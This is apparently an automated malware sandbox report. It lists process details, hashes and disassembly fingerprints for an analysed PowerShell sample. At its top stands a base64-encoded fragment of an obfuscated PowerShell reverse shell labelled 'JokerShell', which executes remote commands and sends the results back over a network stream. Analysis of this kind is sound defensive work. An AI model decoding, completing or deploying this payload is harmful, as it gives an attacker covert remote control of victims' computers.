ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=
                                      Imagebase:0xb60000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      Show Windows behavior

                                      File Activities

                                      Show Windows behavior

                                      Section Activities

                                      Show Windows behavior

                                      Registry Activities

                                      Powershell Activities

                                      Show Windows behavior

                                      Mutex Activities

                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      Show Windows behavior

                                      System Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Windows UI Activities

                                      Process Token Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      General

                                      Target ID:3
                                      Start time:15:05:28
                                      Start date:26/04/2025
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                      Imagebase:0x7ff6ca680000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Section Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      Show Windows behavior

                                      Process Activities

                                      Show Windows behavior

                                      Thread Activities

                                      Show Windows behavior

                                      Memory Activities

                                      Show Windows behavior

                                      System Activities

                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Disassembly

                                      Executed Functions

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1376037094.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2ced000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4941ba3f2e2bf6cba7353fb09c4acd29b435d8520e0e2984556b6583c68b23f2
                                      • Instruction ID: e66e99e0f0ba4c6ac824665f61e811ebcce50eebcf29959dfd58e27b7f2e8054
                                      • Opcode Fuzzy Hash: 4941ba3f2e2bf6cba7353fb09c4acd29b435d8520e0e2984556b6583c68b23f2
                                      • Instruction Fuzzy Hash: 0C01006140D3C05FD7128B258994756BFB8DF53224F1DC1DBD9898F1A3C2695849CBB2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1376037094.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2ced000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 189e8866426210b218e54f3e17a57e111a62ee5c009a59d2a6a4403cfad13f86
                                      • Instruction ID: 02736c3a67d8580eb1c279c20c51d988e5db8c442f2ad072328bb439057efb0c
                                      • Opcode Fuzzy Hash: 189e8866426210b218e54f3e17a57e111a62ee5c009a59d2a6a4403cfad13f86
                                      • Instruction Fuzzy Hash: E6018F31404340AEEB205A26CDC4B66BB9CDB81224F1CC51AED5B0A682C7799985CAF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1377011489.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4b70000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c4edda03a37b09f116caf2dfad73461272bae4f214a369a42176b27e4436699
                                      • Instruction ID: 2bc69ba8df8f6136ff95d7952f74d632e0677f5c53cbfdb8f4a569ceb3e13392
                                      • Opcode Fuzzy Hash: 8c4edda03a37b09f116caf2dfad73461272bae4f214a369a42176b27e4436699
                                      • Instruction Fuzzy Hash: 35F01735A001089FCB14CF98D890AEEF7B1FF88324F208199E515A72A1C332AC52CB60

                                      Executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q
                                      • API String ID: 0-1467158625
                                      • Opcode ID: 2e3e0c1020a9721912c8e8f7df1b9118e9a93d8cebf14fdb592f762bd1b54087
                                      • Instruction ID: e1aee0ca3281121add0636c48ca34168fd920924c9ddcc9440d2b8f8883f95be
                                      • Opcode Fuzzy Hash: 2e3e0c1020a9721912c8e8f7df1b9118e9a93d8cebf14fdb592f762bd1b54087
                                      • Instruction Fuzzy Hash: CDA15BF1B10306CFC7358B658491BEBBBA2BFC5211F19846AE401CB691DB31DE45CBA2
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 46bcabe7901650a11263d82813ca6c21718983d924eb0b759bf7e485e6a13c89
                                      • Instruction ID: 99897f789ea83feafd374ead662b1d96b90e7d3d9a2f9983bab292f653c44cb8
                                      • Opcode Fuzzy Hash: 46bcabe7901650a11263d82813ca6c21718983d924eb0b759bf7e485e6a13c89
                                      • Instruction Fuzzy Hash: AFF10F74A00209EFDB25DF98D894AAEBBB2FF48310F648559E805AB355C735ED41CF90
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0396fa11708f189d19ad2acd10d1df7ed490f577e335609dc77622749afa2b3
                                      • Instruction ID: b468ebfcd5b898bcc2d0dc16cdbff2ffc0f34a0250cd52133fb2bef9740824fa
                                      • Opcode Fuzzy Hash: f0396fa11708f189d19ad2acd10d1df7ed490f577e335609dc77622749afa2b3
                                      • Instruction Fuzzy Hash: 1842C73490A3859FDB26DF68C890AEDBFB2FF46214F1A4186D444DB362C734AD45CBA1
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2943dd475424839f3ac2e0307a35d73d1294b6cc7229827aa0bdcd73f6f7f95b
                                      • Instruction ID: 03a5564a82dfe42ef7ce97529d2894894859fd1e1db20c968275a7431c8f6273
                                      • Opcode Fuzzy Hash: 2943dd475424839f3ac2e0307a35d73d1294b6cc7229827aa0bdcd73f6f7f95b
                                      • Instruction Fuzzy Hash: D8413D74A042099FCB64DF58C894AAEB7B1FF89320B248659D915AB3A5D731EC41CF60
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d78348e629345445ce51789ff13944634bb362490ef0c63b6e610d03acea201
                                      • Instruction ID: 553bad0eb34ed3614e3c45c84cb3cb7c75b1fc9d55f84c994a9518a75f44fef9
                                      • Opcode Fuzzy Hash: 1d78348e629345445ce51789ff13944634bb362490ef0c63b6e610d03acea201
                                      • Instruction Fuzzy Hash: 12414D74A042099FCB64DF58C894ABEB7F1FF89320B248659D915AB3A5D731EC41CFA0
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c972d200b4c7742b9d8f10a033de4e7cff64f3fe89c982b2a200f3a8be01813
                                      • Instruction ID: d200dfb523d405304c3a17cb15c3f7de7ef5d1cd2578e7f2cbb19af6d5cc0738
                                      • Opcode Fuzzy Hash: 1c972d200b4c7742b9d8f10a033de4e7cff64f3fe89c982b2a200f3a8be01813
                                      • Instruction Fuzzy Hash: 0DD1AC74A006068FCB25DF58C494EBAFBB2FF88314B2486A9D4559B361DB35EC41CFA0
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d3c6e1d27760b5e90b17102d2d834bd23064ebd493743a8835a75785a0afeb4
                                      • Instruction ID: db70fbeadc0ee3f68735ad1b6d04b8bcfdf8cbc5fb4d29d718fba2eb66bf11c7
                                      • Opcode Fuzzy Hash: 4d3c6e1d27760b5e90b17102d2d834bd23064ebd493743a8835a75785a0afeb4
                                      • Instruction Fuzzy Hash: 2FD10874A002099FDB15DF98D884AADFBB2FF48710F288559E815AB355C735ED82CF90
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: edc7bf049e52929560e7905b61233773b172615612a468173fe49f93a482ac2c
                                      • Instruction ID: 0177d083d4e5de32a0bff472efd6c1f763d97362767a5bb57363e2101507143e
                                      • Opcode Fuzzy Hash: edc7bf049e52929560e7905b61233773b172615612a468173fe49f93a482ac2c
                                      • Instruction Fuzzy Hash: DED1F574E01209DFDB25DFA8D484AADBBB2BF88310F258159E805AB365C735ED46CF90
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07960d6b9011015c821c9a71f4e0ac57c5cd6884198a3ceb6c8cd44d3021af5b
                                      • Instruction ID: d42b568a92f1de37984f6c8d3f7c2d4772571dda9dace992dcc6b84105a011b9
                                      • Opcode Fuzzy Hash: 07960d6b9011015c821c9a71f4e0ac57c5cd6884198a3ceb6c8cd44d3021af5b
                                      • Instruction Fuzzy Hash: 5B51D834A00209EFDB15DF98D894AADBBB2FF88314F248559E805AB365C735ED82CF50
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 019826faae83abde3635549c144712544b3ac521b6249dfd20669cb65a18145f
                                      • Instruction ID: bd02d05cd05352da64bd00e561e7635a53da34613e82f7b5323affa600fba707
                                      • Opcode Fuzzy Hash: 019826faae83abde3635549c144712544b3ac521b6249dfd20669cb65a18145f
                                      • Instruction Fuzzy Hash: 54418074B093448FC712DF68D8909A9BFF2FF8A210B1540AAD949DB362D735EC46CB61
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c21d16b24e7eaa91cceac3edde42b7385ddd26e822eca1127db012069b2730da
                                      • Instruction ID: e7c4a5c63789acaf19f650dd7d1d9638cd41db0563899689038281b99efb3581
                                      • Opcode Fuzzy Hash: c21d16b24e7eaa91cceac3edde42b7385ddd26e822eca1127db012069b2730da
                                      • Instruction Fuzzy Hash: B241F7F1600301DFCB318F158581AFA7BA6BB85215F1984A6E8049F655D731DE45CBB2
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53d47bb452f80e8b511f4b1bb4a06a9db328a1556d7aa209cc5b3ecb92e91b53
                                      • Instruction ID: f2555960650f6c2000e7ecc63b3a59ca319e62e3ed978becf7d35572927344e0
                                      • Opcode Fuzzy Hash: 53d47bb452f80e8b511f4b1bb4a06a9db328a1556d7aa209cc5b3ecb92e91b53
                                      • Instruction Fuzzy Hash: 9D31C174A093459FC715EF1CC8A4AAAFBB1FF4A310B298596D858DB352C734EC41CBA1
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 257a5ac2ce337f8359bd1b79acaf3aa868056492c2356b5af28468bd4da7d934
                                      • Instruction ID: 36919b8a5154d3da48645cfe68d8ed213f1bdabae3a20e3e0e10dd75764ceaaf
                                      • Opcode Fuzzy Hash: 257a5ac2ce337f8359bd1b79acaf3aa868056492c2356b5af28468bd4da7d934
                                      • Instruction Fuzzy Hash: F6314870301319AFDF359A75AC507BA3BE6ABC9210F18842AF905CB2E1DA36C961C791
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 51991bc60acba74fa8b28d1ea80049acbcc2e32e8d5571fc0275690bdaf9e86d
                                      • Instruction ID: 50fc4e8c94106149bb7ec901150c9218ca9c5f7f895478ddabd70fc1e99313a8
                                      • Opcode Fuzzy Hash: 51991bc60acba74fa8b28d1ea80049acbcc2e32e8d5571fc0275690bdaf9e86d
                                      • Instruction Fuzzy Hash: 363158F57043419FCB388B6558417EA7BE2ABC8210F19806AE5048B252DB31DB41CBD1
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82a38bb4fdd4c8dd9e1f0f85339cb618e13dc6d1ffab73e05aad5a5e550f216f
                                      • Instruction ID: a0e167ecf04de4e795a6970f253137c422437922d159dd30c4450ecea9ded7a4
                                      • Opcode Fuzzy Hash: 82a38bb4fdd4c8dd9e1f0f85339cb618e13dc6d1ffab73e05aad5a5e550f216f
                                      • Instruction Fuzzy Hash: D6116A70304754ABEB289A75AC41BBA3793ABC4310F18C439FA494F391CA36DA46CBD0
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1370285394.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eb0d322e2af7860bb5831cc4b31c5af393307938b1d4407b22107891249f1c14
                                      • Instruction ID: cce6b705551dd3f731bd2c04f1de24f0261515aec171a7375fa37c7972340bf8
                                      • Opcode Fuzzy Hash: eb0d322e2af7860bb5831cc4b31c5af393307938b1d4407b22107891249f1c14
                                      • Instruction Fuzzy Hash: F9110734A00209EFDB15DFA8D894E9DBBB2BF48314F288558E405AB361C775EC86CF50
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1369997019.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_4c9d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cdf7d5880399ecb71fcc0ed1f5b86a5b55c2a6a998fde181f4f86ca0376f52dd
                                      • Instruction ID: 4b1e129812e598b06179a9ce48e15ef3f041e2d295830cc4510f8a86241212ab
                                      • Opcode Fuzzy Hash: cdf7d5880399ecb71fcc0ed1f5b86a5b55c2a6a998fde181f4f86ca0376f52dd
                                      • Instruction Fuzzy Hash: 5B01527140E3C06FD7128B259D98B52BFB4EF43224F19C1DBD8889F193C2695849CB72
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1369997019.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_4c9d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 966865db6ffa8ebf34fd066ab0e4ad6647619f44c2c3884db1d2b5ac541ae452
                                      • Instruction ID: 3e72457db08bf5796cf9612e80343411142d473abe47d07312f64f164c0b0e11
                                      • Opcode Fuzzy Hash: 966865db6ffa8ebf34fd066ab0e4ad6647619f44c2c3884db1d2b5ac541ae452
                                      • Instruction Fuzzy Hash: 6001F731504340BAEB204E12DDC8B67FBD9EF41220F08C159EC4A1F282D679AD41CAB1

                                      Non-executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q
                                      • API String ID: 0-492062855
                                      • Opcode ID: eed436f005711ec2073cf64381cf7a568085a2ac888804fa12ed31a8b3e1bc8d
                                      • Instruction ID: a032f9c123ac421579ecb2d34a53d17fecb228b5eba0bd43644c412d248eaf7d
                                      • Opcode Fuzzy Hash: eed436f005711ec2073cf64381cf7a568085a2ac888804fa12ed31a8b3e1bc8d
                                      • Instruction Fuzzy Hash: 068137B1700316DFD7358B6994817BBBBE2AFC5210F18806AE845CB791DB32DD85CBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$tPq$tPq$tPq$tPq
                                      • API String ID: 0-1597207323
                                      • Opcode ID: ed3ea3a7fe5f2814b7c711eb9dad304ddc8f51561f8875f4b6b6131c7aa26e77
                                      • Instruction ID: 8d9c0fe955c359e939ca3340d0e406f804457494b8157c2fd5ab9f03806e88a2
                                      • Opcode Fuzzy Hash: ed3ea3a7fe5f2814b7c711eb9dad304ddc8f51561f8875f4b6b6131c7aa26e77
                                      • Instruction Fuzzy Hash: DDB13BB1B0434A8FD7308B6688917EBBBF2AF86211F1C806AE5459B281DB31DD41C791
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tPq$tPq$$q$$q$$q
                                      • API String ID: 0-4232885863
                                      • Opcode ID: 0a0e53dbbf93304c5f686c611a667348cdea9fde1102dc157ebcdaa02eadcfaf
                                      • Instruction ID: 6344a8464c9ddf3d1180bc18cc6859f0b7c052ca3965f481e378aa8444b3b57b
                                      • Opcode Fuzzy Hash: 0a0e53dbbf93304c5f686c611a667348cdea9fde1102dc157ebcdaa02eadcfaf
                                      • Instruction Fuzzy Hash: 7A312A723043199FD7259A6998506A7BBE5AFC5220F2C806BF545CB361CB32ED01C790
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q
                                      • API String ID: 0-4102054182
                                      • Opcode ID: 22f0727d08bc8f6c5cc41f62811c81e19b75e43e9f75ba63224815375211db1c
                                      • Instruction ID: 39c47ad0f20161fe2bfec6f81c1dffc654140ce5d25fd42d044b06886c423370
                                      • Opcode Fuzzy Hash: 22f0727d08bc8f6c5cc41f62811c81e19b75e43e9f75ba63224815375211db1c
                                      • Instruction Fuzzy Hash: D02147B17103C6ABEB3446AAD841BA7B7D6DBC1615F28442BB545CB3C1CE36D90582A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$$q$$q
                                      • API String ID: 0-3199993180
                                      • Opcode ID: 5e25d10e3b031d9a5a539a565d2c6e9bab53996e4b9306bdb4674bb268e2eef8
                                      • Instruction ID: d53bbdf3c5d67090180d3db95ad88ce0d637bf8868c1e99c6a084ff99c7381eb
                                      • Opcode Fuzzy Hash: 5e25d10e3b031d9a5a539a565d2c6e9bab53996e4b9306bdb4674bb268e2eef8
                                      • Instruction Fuzzy Hash: 3301F2A1B0D3961FC73B12252C211A66F726FC3410B2E4197D1C1DF293CD598D86C3A6